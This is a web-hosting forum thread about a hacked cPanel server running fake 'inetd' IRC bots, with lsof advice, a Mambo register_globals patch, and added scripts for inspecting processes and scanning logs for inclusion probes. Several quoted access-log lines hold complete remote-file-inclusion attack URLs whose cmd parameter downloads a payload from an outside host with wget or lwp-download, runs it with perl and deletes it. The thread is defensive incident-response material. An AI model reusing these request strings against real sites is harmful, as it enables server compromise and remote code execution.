How to locate the source of a hacked server

garnar

Member
Jul 1, 2004
My cPanel server, running:

WHM 10.8.0 cPanel 10.8.1-R113
Fedora i686 - WHM X v3.1.0

has been hacked into. On boot I get this inetd service that loads up and hogs most of the CPU/RAM. After a while it will spawn other inetd processes running as user nobody. I am unable to locate where this is started from. These are the processes:

24668 nobody 0 26.1 0.2 inetd
24963 nobody 0 25.5 0.2 inetd
25017 nobody 0 25.2 0.2 inetd
23896 nobody 0 22.9 0.2 /var/sbin/whos
23999 nobody 0 19.9 0.2 /var/tmp/whos
17984 nobody 0 19.6 0.2 inetd
18311 nobody 0 19.6 0.2 inetd
18641 nobody 0 19.3 0.2 inetd
26543 nobody 0 19.3 0.2 inetd

Running netstat I see this:
tcp 0 80 cpanel.binghamXXX.XXX:36689 ircd-188.buy-a-shell.n:ircd ESTABLISHED
tcp 0 80 cpanel.binghamXXX.XXX:36690 ircd-188.buy-a-shell.n:ircd ESTA

I am not running any IRC servers on this machine, so I know something is wrong here. I would like to be able to locate where this fake inetd starts from and kill it. Thanks in advance for any help.
 

chirpy

Well-Known Member
Verified Vendor
Jun 15, 2002
It's too broad a subject to cover the issue in a forum thread and you'd be advised to hire a security expert.

That said, using tools such as lsof will help you track down the location of exploits:

lsof -p 24668 | more

After cleaning up the mess, the next major step is finding out how they got in, and that involves trawling all your web logs in:

/usr/local/apache/logs/*
/usr/local/apache/domlogs/*

The process name is usually completely meaningless as any script or binary can change its name - indeed it's what they do to try and avoid detection and likely has nothing to do with inetd.
 
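As an added example, not from chirpy's post and not cPanel's own tooling, here is a small POSIX sh helper that does for one PID what `lsof -p` is being suggested for: it ties the process to the file it was started from by reading /proc/PID/exe, /proc/PID/cwd and /proc/PID/cmdline, and it flags the two things that stand out in the listing above, a binary living in /tmp or /var/tmp and a process name that does not match its executable. It assumes a Linux /proc. The second parameter (an alternate /proc root), the helper make_fake_proc, the PIDs 4242 and 4343 and the paths in that fake tree are constructed for illustration only.

```shell
#!/bin/sh
# Added example, not part of the thread: tie a suspicious PID back to the file
# it was started from. ps and top print argv[0], which any program can set to
# "inetd"; /proc/PID/exe is a kernel-maintained link to the real binary (the
# same thing lsof -p lists as the "txt" entry).
#
# pid_report PID [PROCROOT]
#   prints exe, cwd and cmdline and returns 0 when nothing looks off, 1 when
#   the binary is gone or lives in a scratch directory, 2 when PID is absent.
#   PROCROOT defaults to /proc; it is a parameter only so the function can be
#   exercised against the constructed tree built by make_fake_proc below.

pid_report() {
    pid=$1
    procroot=${2:-/proc}
    dir="$procroot/$pid"
    [ -d "$dir" ] || { echo "pid $pid: no such process"; return 2; }

    exe=$(readlink "$dir/exe" 2>/dev/null || true)
    cwd=$(readlink "$dir/cwd" 2>/dev/null || true)
    cmd=""
    # cmdline is NUL-separated argv; render it with spaces
    [ -r "$dir/cmdline" ] && cmd=$(tr '\0' ' ' < "$dir/cmdline")

    echo "pid $pid"
    echo "  exe:     ${exe:-(unreadable)}"
    echo "  cwd:     ${cwd:-(unreadable)}"
    echo "  cmdline: ${cmd:-(unreadable)}"

    rc=0
    case "$exe" in
        "")
            echo "  WARN: cannot read exe (run as root; kernel threads have none)"; rc=1 ;;
        *" (deleted)")
            echo "  WARN: binary unlinked after start; preserve it with: cp $dir/exe /root/evidence.$pid"; rc=1 ;;
        /tmp/*|/var/tmp/*|/dev/shm/*)
            echo "  WARN: binary lives in a world-writable scratch directory"; rc=1 ;;
    esac
    case "$cwd" in
        /tmp|/tmp/*|/var/tmp|/var/tmp/*|/dev/shm|/dev/shm/*)
            echo "  WARN: working directory is a scratch directory"; rc=1 ;;
    esac
    return $rc
}

# Constructed stand-in for /proc (sample data, not from any real host):
# PID 4242 mimics the thread's /var/tmp/whos process, PID 4343 a normal daemon.
make_fake_proc() {
    root=$1
    mkdir -p "$root/4242" "$root/4343"
    ln -s /var/tmp/whos "$root/4242/exe"
    ln -s /tmp "$root/4242/cwd"
    printf 'inetd\0' > "$root/4242/cmdline"        # argv[0] claims to be inetd
    ln -s /usr/sbin/sshd "$root/4343/exe"
    ln -s / "$root/4343/cwd"
    printf '/usr/sbin/sshd\0-D\0' > "$root/4343/cmdline"
}

FAKE=$(mktemp -d)
make_fake_proc "$FAKE"
for p in 4242 4343; do
    if pid_report "$p" "$FAKE"; then
        echo "  verdict: looks normal"
    else
        echo "  verdict: investigate"
    fi
done
rm -rf "$FAKE"
```

On the live box, run it as root against the real PIDs (`pid_report 24668`) and pair it with `lsof -p 24668 -n -P`, which also lists the sockets, so the ircd connections from the netstat output will appear against the process that owns them. Since the thing comes back on every boot, the second question is what starts it: check what runs as nobody on a schedule (`crontab -u nobody -l`, /var/spool/cron) and list /tmp and /var/tmp, which is where both whos binaries in the listing live; if nothing is scheduled, the box is most likely simply being re-exploited through the same hole, which is what the web-log search chirpy describes is for.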

garnar

Member
Jul 1, 2004
Thanks for the tip, I was just looking for a few commands to tie a process to a file that I could find on the system.
 

clara

Member
Aug 31, 2005
I have the exact same issue: CPU runs too high because of the nobody inetd process, and there is no way I can access any site, WHM, or cPanel. I have to reboot the system just to see the same thing again in a few hours.
 

garnar

Member
Jul 1, 2004
This is due to a Mambo install that is not up to date. What happens is they use a PHP exploit to download a file from a remote server, then it spawns multiple fake inetd daemons that act as IRC servers/port scanners and God knows what else. Take a look at getting your Mambo sites patched. The cPanel script to auto-install installs a version that is out of date and has known exploits for it.

In your index.php and index2.php files you need to use this code at the top. Also, I suggest doing this for the index files located in the administrator dir. Additionally, you might want to password-protect the admin dir.

/** Set flag that this is a parent file */
define( '_VALID_MOS', 1 );

// Refuse any request that carries a parameter named after a PHP superglobal.
// With register_globals on, a key such as _REQUEST[option] or GLOBALS would
// otherwise be imported into the script's variable space and can be used to
// overwrite $mosConfig_absolute_path before it is used in an include.
$protects = array('_REQUEST', '_GET', '_POST', '_COOKIE', '_FILES', '_SERVER', '_ENV', 'GLOBALS', '_SESSION');

foreach ($protects as $protect) {
    if (array_key_exists($protect, $_REQUEST) ||
        array_key_exists($protect, $_GET) ||
        array_key_exists($protect, $_POST) ||
        array_key_exists($protect, $_COOKIE) ||
        array_key_exists($protect, $_FILES)) {
        die("Invalid Request.");
    }
}
// checks for configuration file, if none found loads installation page
 

brianoz

Well-Known Member
Mar 13, 2004
Melbourne, Australia
cPanel Access Level
Root Administrator
Does anyone know the exploit URL that they use to break in via Mambo? Is this Mambo specific or does it apply to Joomla as well?

The reason I'm asking for the exploit URLs is that we can then block them with mod_security. This saves time over going through hundreds of Mambo/Joomla sites!! :)

Anyone know?
 

garnar

Member
Jul 1, 2004
This is what I have seen so far, I'm looking for the other host that was doing this:

82.77.174.39 - - [15/May/2006:14:16:12 -0400] "GET /portal/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radius01.comete.ci/tool.gif?&cmd=cd%20/tmp/;wget%20http://radius01.comete.ci/session.gif;perl%20session.gif;rm%20-rf%20session.*? HTTP/1.0" 404 288

EDIT: Here's the other one; there is one more, and when I find it I'll let you know.

66.197.38.94 - - [16/May/2006:03:17:19 -0400] "GET /portal/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebs.com/aubyn/tools.gif?&cmd=cd%20/tmp/;lwp-download%20http://www.freewebs.com/aubyn/gif.txt;perl%20gif.txt;rm%20-rf%20gif*? HTTP/1.0" 404 -
 

garnar

Member
Jul 1, 2004
brianoz said:
Does anyone know the exploit URL that they use to break in via Mambo? Is this Mambo specific or does it apply to Joomla as well?

The reason I'm asking for the exploit URLs is that we can then block them with mod_security. This saves time over going through hundreds of Mambo/Joomla sites!! :)

Anyone know?
That's a good and a bad idea. You really need to make the code changes to Mambo/Joomla so this doesn't happen. Anyone can run code on your server under the user Apache runs as.
 

brianoz

Well-Known Member
Mar 13, 2004
Melbourne, Australia
cPanel Access Level
Root Administrator
garnar said:
Thats a good and a bad idea. You really need to make the code changes to Mambo/Joomla so this doesnt happen.
Yes, ideally, but since Mambo/Joomla don't have an autoupdate function at the moment, this requires going through a whole server. A mod_security blocking rule is an instant fix, so it's a great idea and works well for most of the hosting population. Over time, sure, the users can go back and update their Joomla installations, but that's not something most of us have time to do.

Looks like a standard mod_security rule for wget, which most people should have, will block this, but obviously it's still worth updating Joomla over time.

garnar said:
Anyone can run code on your server under the user apache runs as.
And, if you run phpsuexec, that's only a normal user. If you run as nobody, then ... well ... open slather I guess! And, unless I'm confused, if you have the mod_security blocking rule, then nobody can use the holes anyway, so what's the problem?

This goes back to a basic security principle which is what you were alluding to above. It's not enough to have one level of security - for instance, just mod_security, because if mod_security fails you're in trouble. You need two levels of security - updated Joomla/phpBB scripts, as well as mod_security.
 
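Two posts above ask for the same thing from opposite ends: garnar shows the exploit lines as they appear in the access log, and brianoz wants a pattern to block them with. As an added example, not from either post and not a cPanel or mod_security rule, here is a shell/awk scanner that pulls those probes out of Apache access logs using the one shape they share, a query parameter whose value is itself a URL (mosConfig_absolute_path=http://...), and annotates each hit with whether it also carried the _REQUEST[...]/GLOBALS= register_globals trick and a cmd= payload. It assumes Apache combined/common log format (field 7 is the request path); the function names rfi_scan and rfi_count and the sample log (RFC 5737 addresses) are constructed for this example.

```shell
#!/bin/sh
# Added example, not part of the thread: pick Mambo/Joomla remote-file-inclusion
# probes out of Apache access logs. The requests quoted in the thread all share
# one shape, a query parameter whose value is itself a URL (here
# mosConfig_absolute_path=http://...), usually with cmd= riding along, so the
# request line alone is enough to flag them. Written for Apache combined/common
# log format, where $7 is the request path.
#
# rfi_scan  [LOG ...]  prints "client status url [register_globals] [cmd]" per hit
# rfi_count [LOG ...]  prints the number of hits
# Both read stdin when no file is given.

rfi_scan() {
    awk '
        # only PHP requests whose query string carries an http(s):// value
        $7 ~ /\.php\?/ && match($7, /=https?:\/\/[^&]*/) {
            url = substr($7, RSTART + 1, RLENGTH - 1)           # drop the "="
            rg  = ($7 ~ /[?&](_REQUEST\[|GLOBALS=)/) ? " register_globals" : ""
            cmd = ($7 ~ /[?&]cmd=/) ? " cmd" : ""
            print $1, $9, url rg cmd
        }' "$@"
}

rfi_count() {
    rfi_scan "$@" | wc -l | tr -d ' '
}

# Constructed sample log (RFC 5737 addresses, not real traffic). The first
# line copies the shape of the probes quoted in the thread; the second is an
# ordinary Joomla page view; the third is a probe that got a 200 and so
# deserves a closer look.
sample_log() {
    cat <<'EOF'
203.0.113.5 - - [15/May/2006:14:16:12 -0400] "GET /portal/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://198.51.100.7/tool.gif?&cmd=cd%20/tmp/;lwp-download%20http://198.51.100.7/gif.txt;perl%20gif.txt HTTP/1.0" 404 288
203.0.113.9 - - [16/May/2006:03:17:19 -0400] "GET /index.php?option=com_content&Itemid=1 HTTP/1.1" 200 5120
198.51.100.22 - - [16/May/2006:03:20:00 -0400] "GET /portal/index.php?mosConfig_absolute_path=https://198.51.100.7/x.txt? HTTP/1.0" 200 1024
EOF
}

sample_log | rfi_scan
echo "hits: $(sample_log | rfi_count)"
```

On the server, point it at the paths chirpy listed (`rfi_scan /usr/local/apache/domlogs/*`) and sort by client. The status column matters: both probes quoted above got a 404, which means Apache found no /portal/index.php on that vhost and that particular request almost certainly never reached PHP; a 200 against a site that really has an unpatched Mambo is the one to chase. Note also that the second probe fetches its payload with lwp-download rather than wget, so a mod_security rule keyed on wget alone lets it through; keying on the `=http://` parameter value, as this awk does, or on mosConfig_absolute_path catches both, at the cost of also matching any legitimate parameter that carries a URL, so watch the false positives before turning a detection pattern into a blocking rule.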

linuxserverguy

Active Member
Apr 14, 2005
garnar said:
This is what I have seen so far, I'm looking for the other host that was doing this:

82.77.174.39 - - [15/May/2006:14:16:12 -0400] "GET /portal/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radius01.comete.ci/tool.gif?&cmd=cd%20/tmp/;wget%20http://radius01.comete.ci/session.gif;perl%20session.gif;rm%20-rf%20session.*? HTTP/1.0" 404 288

EDIT: Heres the other one, there is one more when I find it i'll let you know

66.197.38.94 - - [16/May/2006:03:17:19 -0400] "GET /portal/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebs.com/aubyn/tools.gif?&cmd=cd%20/tmp/;lwp-download%20http://www.freewebs.com/aubyn/gif.txt;perl%20gif.txt;rm%20-rf%20gif*? HTTP/1.0" 404 -
Can you please tell me where to find these logs? Thanks.

Never mind.
 